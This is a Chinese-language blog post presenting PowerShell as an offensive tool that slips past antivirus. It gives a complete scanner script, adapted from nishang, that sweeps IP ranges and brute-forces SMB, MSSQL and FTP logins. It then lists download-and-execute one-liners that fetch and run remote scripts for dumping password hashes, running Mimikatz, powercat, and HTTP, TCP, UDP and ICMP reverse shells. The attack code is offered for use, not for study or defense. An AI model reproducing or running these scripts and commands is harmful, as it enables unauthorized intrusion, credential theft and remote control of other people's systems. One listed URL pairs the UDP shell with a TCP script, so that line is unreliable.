1.前言
powershell 功能异常强大,需要.NET 2.0以上环境,不要第三方支持,白名单,轻松过杀软。
在win7/server 2008以后,powershell已被集成在系统当中
============================================
2.基础语法
有点和php一样呢。直接百度一个网站开始学习。。。
http://www.pstips.net/powershell-online-tutorials/
非常简单的学习了一些,来一个脑图:
另外需要说明的是如何加载ps脚本的问题:
方法1:powershell IEX (New-Object Net.WebClient).DownloadString('https://raxxxxx/xxx.ps1');
方法2: set-ExecutionPolicy RemoteSigned
Import-Module .\xxxxx.ps1 [导入模块]
================================
3.实例代码
学了不用等于白学,招了一个github 源码[https://github.com/samratashok/nishang/tree/master/Scan],
抄抄改改,写出一个端口扫描,并且支持ftp,smb和mssql爆破ps1脚本
代码:
function Port-Scan {
[CmdletBinding()] Param(
[parameter(Mandatory = $true, Position = 0)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$StartAddress,
[parameter(Mandatory = $true, Position = 1)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$EndAddress,
[string]
$file,
[int[]]
$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
[int]
$TimeOut = 100
)
Begin {
$ping = New-Object System.Net.Networkinformation.Ping
}
Process {
#init Brute force SQL Server function
$Connection = New-Object System.Data.SQLClient.SQLConnection
$result=@()
foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
$ip="$a.$b.$c.$d"
$pingStatus = $ping.Send($ip,$TimeOut)
$openport=@()
if($pingStatus.Status -eq "Success") {
write-host "$ip is alive" -ForegroundColor red
for($i = 1; $i -le $ports.Count;$i++) {
$port = $Ports[($i-1)]
$client = New-Object System.Net.Sockets.TcpClient
$beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
Start-Sleep -Milli $TimeOut
if($client.Connected) {
$openport += $port
write-host "$ip open $port" -ForegroundColor red
"$ip open $port" | out-file -Append -filepath $file
}
$client.Close()
}
$iphash=@{ip=$ip;ports=$openport}
$result +=$iphash
}
}
}
}
}
foreach ($i in $result){
foreach ($port in $i.ports){
#brute smb
$ip=$i.ip
if($port -eq 445){
Write-host "Brute Forcing smb Service on $ip...." -ForegroundColor Yellow
$conf=Get-Content 'conf\smb.conf'
foreach ($j in $conf){
$username=$j.Split(":")[0]
$password=$j.Split(":")[1]
if (wmic /user:$username /password:$password /node:$ip process call create "") {
Write-Host "login smb to $ip with $username : $password is successful" -ForegroundColor green
"login smb to $ip with $username : $password is successful" | out-file -Append -filepath $file
break
}else{
Write-Host "login smb to $ip with $username : $password is fail"
}
}
}
#brute mssql
if($port -eq 1433){
Write-host "Brute Forcing SQL Service on $ip...." -ForegroundColor Yellow
$conf=Get-Content 'conf\mssql.conf'
foreach ($j in $conf){
$username=$j.Split(":")[0]
$password=$j.Split(":")[1]
$Connection.ConnectionString = "Data Source=$ip;Initial Catalog=Master;User Id=$username;Password=$password;"
Try
{
$Connection.Open()
$success = $true
}
Catch
{
$success = $false
Write-host "login mssql to $ip with $username : $password fail "
}
if($success -eq $true)
{
Write-host "login mssql to $ip with $username : $Password is successful" -ForegroundColor green
"login mssql to $ip with $username : $Password is successful"| out-file -Append -filepath $file
Break
}
}
}
if($port -eq 21){
Write-host "Brute Forcing ftp Service on $ip...." -ForegroundColor Yellow
$source = "ftp://" + $ip
$conf=Get-Content 'conf\ftp.conf'
foreach ($j in $conf){
Try
{
$username=$j.Split(":")[0]
$password=$j.Split(":")[1]
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
$ftpRequest.Credentials = new-object System.Net.NetworkCredential($username, $password)
$result = $ftpRequest.GetResponse()
$message = $result.BannerMessage + $result.WelcomeMessage
Write-host "login ftp to $ip with $username : $password is successful" -ForegroundColor green
"login ftp to $ip with $username : $password is successful"| out-file -Append -filepath $file
break
}
Catch {
Write-host "login ftp to $ip with $username : $password fail "
}
}
}
}
}
Write-host "put all into $file" -ForegroundColor red
}
End {
}
}效果:
bug:
1.代码是单线程的速度一定慢,不知道powershell要怎么去分配线程池
2.smb直接使用了wmic命令,当密码不对时候会显示一个错误,不知道如何去屏蔽不显示
代码没有没有进行服务指纹识别什么的,还是非常粗糙的
================================
4.一些很屌的powershell工具
4.1.获取hash
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
4.2.获取明文---Mimikatz
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
4.3 nc---powercat
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
4.4----各种反弹shell
http:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PoshRatHttps.ps1')
tcp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')
udp:
IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1')
icmp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1')
来源:
https://github.com/samratashok/nishang
================================
5.结尾
资料来源:
转载
分享
发布投稿
